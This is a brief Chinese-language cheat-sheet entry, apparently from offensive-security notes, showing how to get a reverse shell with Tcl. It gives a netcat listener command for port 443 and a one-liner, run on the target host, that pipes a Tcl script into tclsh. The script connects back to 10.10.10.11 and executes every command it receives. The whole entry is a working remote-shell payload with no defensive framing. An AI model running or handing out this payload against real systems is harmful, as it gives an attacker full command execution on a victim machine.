# TCL脚本反弹shell
首先在本地监听TCP协议443端口
```bash
nc -lvp 443
```
然后在靶机上执行如下命令:
```bash
echo 'set s [socket 10.10.10.11 443];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
```